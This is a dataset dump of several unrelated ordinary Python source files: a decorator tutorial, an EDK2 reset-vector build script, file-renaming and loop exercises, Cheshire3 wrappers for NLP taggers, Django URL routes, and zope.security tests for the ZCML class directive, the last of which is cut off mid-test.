id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
172192 | """
Tema: Funciones decoradoras.
Curso: Curso de python, video 74.
Plataforma: Youtube.
Profesor: <NAME> - Pildoras informaticas.
Alumno: @edinsonrequena.
"""
def funcion_decoradora(funcion_como_parametro):
    """Decorator: surround a function call with before/after log messages.

    Args:
        funcion_como_parametro: the callable to decorate.

    Returns:
        A wrapper that prints a message, calls the wrapped function with the
        original positional/keyword arguments, prints a closing message and
        returns the wrapped function's result.  (The original version
        discarded the result, so decorated functions always returned None.)
    """
    def funcion_interior(*args, **kwargs):
        print('Codigo que se ejecutara antes de llamar a la funcion a decorar')
        resultado = funcion_como_parametro(*args, **kwargs)
        print('Codigo que se ejecutara despues de llamar a la funcion a decorar')
        # Propagate the wrapped function's return value to the caller.
        return resultado
    return funcion_interior
# Sample functions: every one except `resta` is wrapped by the decorator
# defined above, so their calls are surrounded by the before/after messages.
@funcion_decoradora
def suma(num1, num2, num3):
    """Print the sum of three numbers."""
    print(num1 + num2 + num3)


def resta(num1, num2):
    """Print the difference of two numbers (deliberately not decorated)."""
    print(num1 - num2)


@funcion_decoradora
def division(num1, num2):
    """Print the quotient of two numbers."""
    print(num1 / num2)


@funcion_decoradora
def potencia(base, exponente):
    """Print base raised to the power exponente."""
    print(pow(base, exponente))


if __name__ == '__main__':
    suma(5, 10, 16)
    resta(8, 6)
    potencia(base=5, exponente=10)
    division(5, 7)
8120849 | ## @file
# Automate the process of building the various reset vector types
#
# Copyright (c) 2009 - 2021, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
import os
import subprocess
import sys
# Page-table flavour identifiers (also used as Bin/X64 sub-directory names).
PAGE_TABLE_2M = 'PageTable2M'
PAGE_TABLE_1G = 'PageTable1G'
# Extension for the raw reset-vector binaries, and a glob matching them all.
FILE_FORMAT = '.raw'
ALL_RAW_FORMAT = '*' + FILE_FORMAT
# Architecture directory names under Bin/.
IA32 = 'IA32'
X64 = 'X64'
# Map page-table flavour -> nasm pre-processor macro name to define.
PAGE_TABLES = {
    PAGE_TABLE_2M : "PAGE_TABLE_2M",
    PAGE_TABLE_1G : "PAGE_TABLE_1G"
}
def RunCommand(commandLine):
    """Run *commandLine* (a sequence of arguments) and return its exit status."""
    exit_status = subprocess.call(commandLine)
    return exit_status
# Check for all raw binaries and delete them, so stale outputs never survive
# a rebuild.
for root, dirs, files in os.walk('Bin'):
    for file in files:
        if file.endswith(FILE_FORMAT):
            os.remove(os.path.join(root, file))

# Build every combination of architecture, debug transport and page-table
# flavour.
for arch in ('ia32', 'x64'):
    for debugType in (None, 'port80', 'serial'):
        for pageTable in PAGE_TABLES:
            # Non-zero sentinel: stays "failed" unless nasm reports success.
            ret = 1
            if arch.lower() == X64.lower():
                directory = os.path.join('Bin', X64, pageTable)
            else:
                directory = os.path.join('Bin', IA32)
            # Output raw binary name carries the arch type (and, when set,
            # the debug transport).
            fileName = 'ResetVector' + '.' + arch
            if debugType is not None:
                fileName += '.' + debugType
            fileName += FILE_FORMAT
            output = os.path.join(directory, fileName)
            # Create the output directory on first use.
            if not os.path.isdir(directory):
                os.makedirs(directory)
            # Prepare the command to execute nasm.
            commandLine = (
                'nasm',
                '-D', 'ARCH_%s' % arch.upper(),
                '-D', 'DEBUG_%s' % str(debugType).upper(),
                '-D', PAGE_TABLES[pageTable].upper(),
                '-o', output,
                'Vtf0.nasmb',
            )
            print(f"Command : {' '.join(commandLine)}")
            try:
                ret = RunCommand(commandLine)
            except FileNotFoundError:
                print("NASM not found")
            except OSError as e:
                # Was a bare "except: pass"; at least report what happened
                # before falling through to the failure exit below.
                print(f"Failed to run nasm: {e}")
            if ret != 0:
                print(f"something went wrong while executing {commandLine[-1]}")
                # The original called sys.exit() here, which exits with
                # status 0 (success); propagate a failure status instead.
                sys.exit(1)
            print('\tASM\t' + output)
            commandLine = (
                'python',
                'Tools/FixupForRawSection.py',
                output,
            )
            print('\tFIXUP\t' + output)
            ret = RunCommand(commandLine)
            if ret != 0:
                sys.exit(ret)
| StarcoderdataPython |
"""
Rename TOPS-20 filespecs to regular files without version number.

A TOPS-20 filespec looks like ``NAME.EXT.3`` where the trailing ``.3`` is a
version number; this strips that suffix from every matching file found in
SOURCEPATH.
"""
from os import listdir, rename
import os.path
import re

SOURCEPATH = "10_7_mon/ctls"

# Raw string: the original plain string relied on '\.' surviving unchanged,
# which is a SyntaxWarning on modern Python.  '\d+' makes the multi-digit
# version case explicit (only group 1 is used, so renames are unaffected).
tops20File = re.compile(r"(.*\.\w\w\w)(\.\d+)")

files = listdir(SOURCEPATH)
# Collect (versioned name, name with the version suffix stripped) pairs
# before renaming, so the directory listing is not mutated mid-scan.
pairs = []
for f in files:
    m = tops20File.match(f)
    if m:
        pairs.append((f, m.group(1)))

for original_name, stripped_name in pairs:
    # Use the explicitly imported rename(); the original imported it but
    # then called os.rename(), which only worked because 'import os.path'
    # happens to bind 'os' as a side effect.
    rename(os.path.join(SOURCEPATH, original_name),
           os.path.join(SOURCEPATH, stripped_name))
| StarcoderdataPython |
# Problem setup: satisfaction grows with each ice cream, prices rise 20%
# per purchase, and we stop at the minimum satisfaction, at the cap, or
# when the money runs out.
edad = 18
inc_satisfaccion_por_helado = edad / 100
satisfaccion_inicial = edad / 100
dinero_inicial = 2000
precio_helado_inicial = 100
inc_precio_helado = 20 / 100
satisfaccion_minima = 85 / 100
satisfaccion_maxima = 100 / 100

# Running state for the simulation.
satisfaccion_actual = satisfaccion_inicial
dinero_actual = dinero_inicial
precio_helado_actual = precio_helado_inicial
helados_consumidos = 0

print("Satisfacción inicial ", satisfaccion_inicial*100)
print()

while (satisfaccion_actual < satisfaccion_minima
       and satisfaccion_actual + inc_satisfaccion_por_helado <= satisfaccion_maxima
       and dinero_actual - precio_helado_actual > 0):
    # Eat one ice cream: update counter, satisfaction and remaining money.
    helados_consumidos += 1
    satisfaccion_actual += inc_satisfaccion_por_helado
    dinero_actual -= precio_helado_actual

    # Progress report for this iteration.
    print("ITERACION ACTUAL ", helados_consumidos)
    print("* Helados consumidos ", helados_consumidos)
    print("* Precio helado ", precio_helado_actual)
    print("* Dinero que nos queda ", dinero_actual)
    print("* Satisfacción ", satisfaccion_actual*100)
    print("------")
    print()

    # The next ice cream is 20% more expensive.
    precio_helado_actual *= 1 + inc_precio_helado

if helados_consumidos <= 0:
    print("No me he podido comer ningún helado :-(")

# Final summary.
print("* Helados TOTALES consumidos ", helados_consumidos)
print("* Dinero TOTAL que me queda ", dinero_actual)
print("* Satisfacción CONSEGUIDA", satisfaccion_actual*100)
249050 | <reponame>cheshire3/cheshire3
from __future__ import absolute_import
import os
import re
from subprocess import Popen, PIPE
from cheshire3.baseObjects import DocumentFactory
from cheshire3.document import StringDocument
from cheshire3.utils import getFirstData, elementType, getShellResult
from cheshire3.exceptions import ConfigFileException
class TsujiiObject:
    """Mixin wrapping the Tsujii-lab part-of-speech tagger as a subprocess.

    Expects to be mixed into a Cheshire3 object that provides get_path()
    for config-resolved paths.  A single long-lived tagger process is kept
    open and fed one sentence per line.
    """

    # Long-lived subprocess handle for the external tagger.
    pipe = None
    tokenizer = None

    _possiblePaths = {
        'executablePath': {
            'docs': ("Path to the tagger executable's directory, as must"
                     "be run from there.")},
        'executable': {
            'docs': 'Name of executable'
        }
    }

    def __init__(self, session, node, parent):
        # The tagger must be launched from its own directory, so chdir
        # there, start the process, then restore the old cwd.
        o = os.getcwd()
        tp = self.get_path(session, 'executablePath')
        if tp:
            os.chdir(tp)
        exe = self.get_path(session, 'executable', './tagger')
        self.pipe = Popen(exe, shell=True, bufsize=1,
                          stdin=PIPE, stdout=PIPE, stderr=PIPE)
        os.chdir(o)

    def tag(self, session, data, xml=0):
        """Tag *data* sentence by sentence; return a list of tagged lines.

        If *xml* is true, each tagged line is converted to inline XML via
        toxml().
        NOTE(review): relies on a module-level ``myTokenizer`` that is not
        imported in the visible module header -- confirm where it comes from.
        """
        all = []
        paras = myTokenizer.split_paragraphs(data)
        for p in paras:
            sents = myTokenizer.split_sentences(p)
            for s in sents:
                try:
                    self.pipe.stdin.write(s)
                except UnicodeEncodeError:
                    # Retry with explicit UTF-8 bytes if the pipe rejects str.
                    self.pipe.stdin.write(s.encode('utf-8'))
                self.pipe.stdin.write("\n")
                self.pipe.stdin.flush()
                # Tagger answers one output line per input sentence.
                tagd = self.pipe.stdout.readline()
                if xml:
                    tagd = self.toxml(tagd)
                all.append(tagd)
        return all

    def toxml(self, data):
        """Convert 'word/POS word/POS ...' tagger output to <t p="POS">word</t> XML."""
        wds = data.split()
        xml = []
        for w in wds:
            t = w.split('/')
            xml.append('<t p="%s">%s</t>' % (t[1], t[0]))
        return " ".join(xml)
class EnjuObject:
    """Mixin wrapping the Enju HPSG parser as a long-lived subprocess.

    Expects get_path()/get_setting()/log_error() from the Cheshire3 object
    it is mixed into.
    """

    # Long-lived subprocess handle for the external parser.
    pipe = None
    tokenizer = None

    _possiblePaths = {
        'executablePath': {
            'docs': "Path to enju executable."
        },
        'executable': {
            'docs': 'Name of executable'
        }
    }

    _possibleSettings = {
        'xml': {
            'docs': 'Should return XML form (1, default) or text (0)',
            'type': int,
            'options': '0|1'
        }
    }

    def __init__(self, session, node, parent):
        tp = self.get_path(session, 'executablePath', '')
        exe = self.get_path(session, 'executable', 'enju')
        if not tp:
            # No configured path: fall back to a `which` lookup, and to the
            # bare executable name if `which` itself reports an error.
            tp = getShellResult('which %s' % exe)
            tp = tp if not tp.startswith('which:') else exe
        else:
            tp = os.path.join(tp, exe)
        xml = self.get_setting(session, 'xml', 1)
        if xml:
            cmd = "%s -xml" % tp
        else:
            cmd = tp
        self.pipe = Popen(cmd, shell=True, bufsize=1,
                          stdin=PIPE, stdout=PIPE, stderr=PIPE)
        l = ""
        # Enju announces readiness on stderr once its models are loaded.
        while l != 'Ready\n':
            # Check for errors with command
            if "command not found" in l:
                self.log_error(session,
                               "Error while initializing EnjuObject: "
                               "{0}".format(l.strip()))
                break
            l = self.pipe.stderr.readline()

    def tag(self, session, data, xml=0):
        """Send one sentence to Enju and return its single-line reply.

        Returns '' for blank input.  The *xml* flag is unused here; output
        format is fixed at process start by the 'xml' setting.
        """
        s = data.strip()
        if not s:
            return ""
        try:
            self.pipe.stdin.write(s)
        except UnicodeEncodeError:
            # Retry with explicit UTF-8 bytes if the pipe rejects str.
            self.pipe.stdin.write(s.encode('utf-8'))
        self.pipe.stdin.write("\n")
        self.pipe.stdin.flush()
        tagd = self.pipe.stdout.readline()
        return tagd
class GeniaObject:
    """Mixin wrapping the GENIA tagger as a long-lived subprocess.

    Expects get_path()/get_setting() from the Cheshire3 object it is mixed
    into; raises ConfigFileException when no executable path can be found.
    """

    # Long-lived subprocess handle for the external tagger.
    pipe = None
    tokenizer = None

    _possiblePaths = {
        'executablePath': {
            'docs': "Path to geniatagger executable."},
        'executable': {
            'docs': 'Name of executable'
        }
    }

    _possibleSettings = {
        'parseOutput': {
            'docs': ("If 0 (default), then the output from the object will "
                     "be the lines from genia, otherwise it will interpret "
                     "back to word/POS"),
            'type': int,
            'options': "0|1"
        },
        'tokenize': {
            'docs': '',
            'type': int,
            'options': '0|1'
        }
    }

    def __init__(self, session, node, parent):
        self.unparsedOutput = self.get_setting(session, 'parseOutput', 0)
        tp = self.get_path(session, 'executablePath', '')
        exe = self.get_path(session, 'executable', 'geniatagger')
        if not tp:
            # Fall back to locating the executable via `which`.
            tp = getShellResult('which %s' % exe)
            tp = os.path.dirname(tp)
        # NOTE(review): tpe appears to be computed but never used.
        tpe = os.path.join(tp, exe)
        if not tp:
            raise ConfigFileException("%s requires the path: "
                                      "executablePath" % self.id)
        # The tagger must run from its own directory (it loads model files
        # relative to cwd), so chdir there and restore afterwards.
        o = os.getcwd()
        os.chdir(tp)
        if self.get_setting(session, 'tokenize', 0):
            cmd = exe
        else:
            # -nt: input is already tokenized.
            cmd = "%s -nt" % exe
        self.pipe = Popen(cmd, shell=True, bufsize=1,
                          stdin=PIPE, stdout=PIPE, stderr=PIPE)
        l = ""
        # Wait for the tagger to finish loading its models (stderr banner).
        while l != 'loading named_entity_models..done.\n':
            l = self.pipe.stderr.readline()
        os.chdir(o)

    def tag(self, session, data, xml=0):
        """Tag one sentence; return a list of per-token results.

        Each result is either the raw genia output line (parseOutput=1) or
        a dict with 'text', 'stem', 'pos' and 'phr' keys.  Returns [] for
        blank input.
        """
        words = []
        s = data.strip()
        if not s:
            return []
        try:
            self.pipe.stdin.write(s)
        except UnicodeEncodeError:
            # Retry with explicit UTF-8 bytes if the pipe rejects str.
            self.pipe.stdin.write(s.encode('utf-8'))
        self.pipe.stdin.write("\n")
        self.pipe.stdin.flush()
        tagline = ""
        # Genia emits one line per token, terminated by a blank line.
        while 1:
            tagline = self.pipe.stdout.readline()
            tagline = tagline.decode('utf-8')
            if tagline == "\n":
                break
            elif tagline.isspace():
                continue
            else:
                if self.unparsedOutput:
                    words.append(tagline)
                else:
                    # Columns: word, stem, POS, chunk tag, named entity.
                    (word, stem, type, type2, ner) = tagline[:-1].split('\t')
                    words.append({'text': word,
                                  'stem': stem,
                                  'pos': type,
                                  'phr': type2})
        return words
| StarcoderdataPython |
4887048 | from pdip.cqrs.decorators import requestclass
@requestclass
class CreateDataIntegrationConnectionQueueRequest:
    """Request payload for creating a data-integration connection queue."""

    # Name of the queue/topic the connection should use.
    TopicName: str = None
| StarcoderdataPython |
1700850 | from django.conf.urls import url
from django.conf.urls import patterns
from rest_framework.urlpatterns import format_suffix_patterns
from observations.api.views import MeasurementList
# Route /measurements/ to the MeasurementList API view.
urlpatterns = patterns(
    '',
    url(r'^measurements/$', MeasurementList.as_view(),
        name="observations_api_measurements"),
)
# Allow format suffixes (e.g. .json) on the routes defined above.
urlpatterns = format_suffix_patterns(urlpatterns)
| StarcoderdataPython |
3573352 | ##############################################################################
#
# Copyright (c) 2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test ZCML directives
"""
import unittest
from zope.security.interfaces import PUBLIC_PERMISSION_NAME as zope_Public
class Test_dottedName(unittest.TestCase):
    """Tests for zope.security.metaconfigure.dottedName."""

    def _callFUT(self, obj):
        # Function-under-test indirection, per zope test convention.
        from zope.security.metaconfigure import dottedName
        return dottedName(obj)

    def test_dottted_name_w_None(self):
        # None has no __module__/__name__; dottedName special-cases it.
        self.assertEqual(self._callFUT(None), 'None')

    def test_dottted_name_w_class(self):
        self.assertEqual(self._callFUT(Test_dottedName),
                         'zope.security.tests.test_metaconfigure.' +
                         'Test_dottedName')
class ClassDirectiveTests(unittest.TestCase):
    """Tests for zope.security.metaconfigure.ClassDirective.

    Each test drives the directive against a DummyZCMLContext and then
    inspects the deferred configuration actions it recorded.
    """

    def _getTargetClass(self):
        from zope.security.metaconfigure import ClassDirective
        return ClassDirective

    def _makeOne(self, _context, class_):
        return self._getTargetClass()(_context, class_)

    #def test_ctor_non_class(self): TODO needs better guard in __init__

    def test_implements_empty(self):
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.implements(context, [])
        self.assertEqual(len(context._actions), 0)

    def test_implements_single_interface(self):
        from zope.component.interface import provideInterface
        from zope.interface import Interface
        from zope.interface import classImplements
        class IFoo(Interface):
            pass
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.implements(context, [IFoo])
        # One classImplements action plus one provideInterface action.
        self.assertEqual(len(context._actions), 2)
        self.assertEqual(context._actions[0]['discriminator'][:2],
                         ('ContentDirective', Foo, )) #3rd is object()
        self.assertTrue(context._actions[0]['callable'] is classImplements)
        self.assertEqual(context._actions[0]['args'], (Foo, IFoo))
        self.assertTrue(context._actions[1]['discriminator'] is None)
        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_implements_multiple_interfaces(self):
        from zope.component.interface import provideInterface
        from zope.interface import Interface
        from zope.interface import classImplements
        class IFoo(Interface):
            pass
        class IBar(Interface):
            pass
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.implements(context, [IFoo, IBar])
        # Two (classImplements, provideInterface) pairs, one per interface.
        self.assertEqual(len(context._actions), 4)
        self.assertEqual(context._actions[0]['discriminator'][:2],
                         ('ContentDirective', Foo, )) #3rd is object()
        self.assertTrue(context._actions[0]['callable'] is classImplements)
        self.assertEqual(context._actions[0]['args'], (Foo, IFoo))
        self.assertTrue(context._actions[1]['discriminator'] is None)
        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))
        self.assertEqual(context._actions[2]['discriminator'][:2],
                         ('ContentDirective', Foo, )) #3rd is object()
        self.assertTrue(context._actions[2]['callable'] is classImplements)
        self.assertEqual(context._actions[2]['args'], (Foo, IBar))
        self.assertTrue(context._actions[3]['discriminator'] is None)
        self.assertTrue(context._actions[3]['callable'] is provideInterface)
        self.assertEqual(context._actions[3]['args'],
                         ('zope.security.tests.test_metaconfigure.IBar', IBar))

    def test_require_only_like_class(self):
        from zope.security.protectclass import protectLikeUnto
        class Bar(object):
            pass
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, like_class=Bar)
        self.assertEqual(len(context._actions), 1)
        self.assertEqual(context._actions[0]['discriminator'][:2],
                         ('mimic', Foo, )) #3rd is object()
        self.assertTrue(context._actions[0]['callable'] is protectLikeUnto)
        self.assertEqual(context._actions[0]['args'], (Foo, Bar))

    def test_require_only_permission(self):
        # A permission alone (no attributes/interface/...) is an error.
        from zope.configuration.exceptions import ConfigurationError
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        self.assertRaises(ConfigurationError,
                          directive.require, context, permission='testing')

    def test_require_no_like_class_wo_permission(self):
        # Attributes without a permission (or like_class) is an error.
        from zope.configuration.exceptions import ConfigurationError
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        self.assertRaises(ConfigurationError,
                          directive.require, context, attributes=('foo', 'bar'))

    def test_require_w_single_interface(self):
        from zope.component.interface import provideInterface
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.protectclass import protectName
        class IFoo(Interface):
            bar = Attribute("Bar")
            baz = Attribute("Baz")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing', interface=[IFoo])
        # One protectName action per interface attribute, plus the
        # provideInterface registration.
        self.assertEqual(len(context._actions), 3)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectName)
        self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
        self.assertTrue(context._actions[2]['discriminator'] is None)
        self.assertTrue(context._actions[2]['callable'] is provideInterface)
        self.assertEqual(context._actions[2]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_require_w_multiple_interfaces(self):
        from zope.component.interface import provideInterface
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.protectclass import protectName
        class IFoo(Interface):
            bar = Attribute("Bar")
        class IBar(Interface):
            baz = Attribute("Baz")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing', interface=[IFoo, IBar])
        self.assertEqual(len(context._actions), 4)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
        self.assertTrue(context._actions[1]['discriminator'] is None)
        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))
        self.assertEqual(context._actions[2]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[2]['callable'] is protectName)
        self.assertEqual(context._actions[2]['args'], (Foo, 'baz', 'testing'))
        self.assertTrue(context._actions[3]['discriminator'] is None)
        self.assertTrue(context._actions[3]['callable'] is provideInterface)
        self.assertEqual(context._actions[3]['args'],
                         ('zope.security.tests.test_metaconfigure.IBar', IBar))

    def test_require_w_attributes(self):
        from zope.security.protectclass import protectName
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing',
                          attributes=['bar', 'baz'])
        self.assertEqual(len(context._actions), 2)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectName)
        self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))

    def test_require_w_set_attributes(self):
        from zope.security.protectclass import protectSetAttribute
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing',
                          set_attributes=['bar', 'baz'])
        self.assertEqual(len(context._actions), 2)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectSetAttribute', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectSetAttribute)
        self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectSetAttribute', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectSetAttribute)
        self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))

    def test_require_w_set_schema_normal_fields(self):
        from zope.component.interface import provideInterface
        from zope.schema import Field
        from zope.interface import Interface
        from zope.security.protectclass import protectSetAttribute
        class IFoo(Interface):
            bar = Field(u"Bar")
            baz = Field(u"Baz")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing', set_schema=[IFoo])
        self.assertEqual(len(context._actions), 3)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectSetAttribute', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectSetAttribute)
        self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectSetAttribute', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectSetAttribute)
        self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
        self.assertTrue(context._actions[2]['discriminator'] is None)
        self.assertTrue(context._actions[2]['callable'] is provideInterface)
        self.assertEqual(context._actions[2]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_require_w_set_schema_ignores_non_fields(self):
        # Plain Attributes are not settable fields, so only the
        # provideInterface action is emitted.
        from zope.component.interface import provideInterface
        from zope.interface import Attribute
        from zope.interface import Interface
        class IFoo(Interface):
            bar = Attribute("Bar")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing', set_schema=[IFoo])
        self.assertEqual(len(context._actions), 1)
        self.assertTrue(context._actions[0]['discriminator'] is None)
        self.assertTrue(context._actions[0]['callable'] is provideInterface)
        self.assertEqual(context._actions[0]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_require_w_set_schema_ignores_readonly_fields(self):
        # Read-only fields cannot be set, so no protectSetAttribute action.
        from zope.component.interface import provideInterface
        from zope.schema import Field
        from zope.interface import Interface
        class IFoo(Interface):
            bar = Field(u"Bar", readonly=True)
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.require(context, permission='testing', set_schema=[IFoo])
        self.assertEqual(len(context._actions), 1)
        self.assertTrue(context._actions[0]['discriminator'] is None)
        self.assertTrue(context._actions[0]['callable'] is provideInterface)
        self.assertEqual(context._actions[0]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_allow_no_attributes_or_interface(self):
        from zope.configuration.exceptions import ConfigurationError
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        self.assertRaises(ConfigurationError, directive.allow, context)

    def test_allow_w_single_interface(self):
        from zope.component.interface import provideInterface
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.protectclass import protectName
        class IFoo(Interface):
            bar = Attribute("Bar")
            baz = Attribute("Baz")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.allow(context, interface=[IFoo])
        # allow() protects the names with the public permission.
        self.assertEqual(len(context._actions), 3)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'],
                         (Foo, 'bar', zope_Public))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectName)
        self.assertEqual(context._actions[1]['args'],
                         (Foo, 'baz', zope_Public))
        self.assertTrue(context._actions[2]['discriminator'] is None)
        self.assertTrue(context._actions[2]['callable'] is provideInterface)
        self.assertEqual(context._actions[2]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))

    def test_allow_w_multiple_interfaces(self):
        from zope.component.interface import provideInterface
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.protectclass import protectName
        class IFoo(Interface):
            bar = Attribute("Bar")
        class IBar(Interface):
            baz = Attribute("Baz")
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.allow(context, interface=[IFoo, IBar])
        self.assertEqual(len(context._actions), 4)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'],
                         (Foo, 'bar', zope_Public))
        self.assertTrue(context._actions[1]['discriminator'] is None)
        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'],
                         ('zope.security.tests.test_metaconfigure.IFoo', IFoo))
        self.assertEqual(context._actions[2]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[2]['callable'] is protectName)
        self.assertEqual(context._actions[2]['args'],
                         (Foo, 'baz', zope_Public))
        self.assertTrue(context._actions[3]['discriminator'] is None)
        self.assertTrue(context._actions[3]['callable'] is provideInterface)
        self.assertEqual(context._actions[3]['args'],
                         ('zope.security.tests.test_metaconfigure.IBar', IBar))

    def test_allow_w_attributes(self):
        from zope.security.protectclass import protectName
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        directive.allow(context, attributes=['bar', 'baz'])
        self.assertEqual(len(context._actions), 2)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('protectName', Foo, 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectName)
        self.assertEqual(context._actions[0]['args'],
                         (Foo, 'bar', zope_Public))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('protectName', Foo, 'baz'))
        self.assertTrue(context._actions[1]['callable'] is protectName)
        self.assertEqual(context._actions[1]['args'],
                         (Foo, 'baz', zope_Public))

    def test___call__(self):
        # Calling the directive itself contributes no extra actions.
        context = DummyZCMLContext()
        directive = self._makeOne(context, Foo)
        self.assertEqual(directive(), ())

    def test_factory_wo_explicit_id(self):
        from zope.component.interfaces import IFactory
        from zope.component.interface import provideInterface
        from zope.component.zcml import handler
        context = DummyZCMLContext()
        context.info = 'INFO'
        directive = self._makeOne(context, Foo)
        directive.factory(context, title='TITLE', description='DESCRIPTION')
        self.assertEqual(len(context._actions), 2)
        # Without an explicit id the dotted class name is used.
        self.assertEqual(context._actions[0]['discriminator'],
                         ('utility', IFactory,
                          'zope.security.tests.test_metaconfigure.Foo'))
        self.assertTrue(context._actions[0]['callable'] is handler)
        args = context._actions[0]['args']
        self.assertEqual(args[0], 'registerUtility')
        factory = args[1]
        self.assertEqual(factory._callable, Foo)
        self.assertEqual(factory.title, 'TITLE')
        self.assertEqual(factory.description, 'DESCRIPTION')
        self.assertEqual(args[2], IFactory)
        self.assertEqual(args[3], 'zope.security.tests.test_metaconfigure.Foo')
        self.assertEqual(args[4], 'INFO')
        self.assertTrue(context._actions[1]['discriminator'] is None)
        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'], ('', IFactory))

    def test_factory_w_explicit_id(self):
        from zope.component.interfaces import IFactory
        from zope.component.interface import provideInterface
        from zope.component.zcml import handler
        context = DummyZCMLContext()
        context.info = 'INFO'
        directive = self._makeOne(context, Foo)
        directive.factory(context, id='test_id')
        self.assertEqual(len(context._actions), 2)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('utility', IFactory, 'test_id'))
        self.assertTrue(context._actions[0]['callable'] is handler)
        args = context._actions[0]['args']
        self.assertEqual(args[0], 'registerUtility')
        factory = args[1]
        self.assertEqual(factory._callable, Foo)
        self.assertEqual(args[2], IFactory)
        self.assertEqual(args[3], 'test_id')
        self.assertEqual(args[4], 'INFO')
        self.assertTrue(context._actions[1]['discriminator'] is None)
